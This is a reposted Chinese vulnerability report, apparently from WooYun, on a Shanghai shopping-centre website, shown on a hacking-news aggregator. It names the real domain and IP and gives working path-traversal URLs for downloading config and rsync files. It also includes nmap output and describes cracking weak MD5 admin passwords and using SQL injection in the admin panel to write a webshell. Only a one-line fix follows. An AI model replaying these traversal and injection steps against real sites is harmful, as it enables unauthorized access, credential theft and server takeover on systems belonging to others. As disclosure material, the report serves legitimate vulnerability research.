记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

上海商城任意文件下载可webshell

2014-12-09 22:48

www.shanghaicentre.com/download.php?file=download.php

1.png



对 file 参数没有做任何过滤,可以下载任意文件。



include/config.php

文件泄漏数据库配置和 smtp 配置(smtp 密码写在另一个php文件)

Selection_008.png





nmap -A 192.241.162.27



Nmap scan report for www.shanghaicentre.com (192.241.162.27)

Host is up (0.26s latency).

Not shown: 995 closed ports

PORT STATE SERVICE VERSION

21/tcp open ftp vsftpd 2.2.2

22/tcp open ssh OpenSSH 5.3 (protocol 2.0)

873/tcp open rsync (protocol version 30)

3306/tcp open mysql MySQL (unauthorized)

Service Info: OS: Unix



开了 rsync,直接连连不上去,下载配置文件看看,

www.shanghaicentre.com/download.php?file=../../../etc/rsyncd/rsyncd.conf

log file = /var/log/rsync.log

下载rsync.log,发现管理后台 www.shanghaicentre.com/vadmin/ 和数据库备份文件路径

Selection_009.png



md5跑一下,密码设置的很简单,进入管理后台,

http://www.shanghaicentre.com/vadmin/admin_edit.php?a_id=1

Selection_010.png



其中 a_id 没有过滤,可注入写文件,获取 webshell。

漏洞证明:

Selection_010.png

修复方案:

对所有 download.php 里 file 参数进行过滤

知识来源: www.wooyun.org/bugs/wooyun-2014-080719

阅读:115537 | 评论:1 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“上海商城任意文件下载可webshell”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词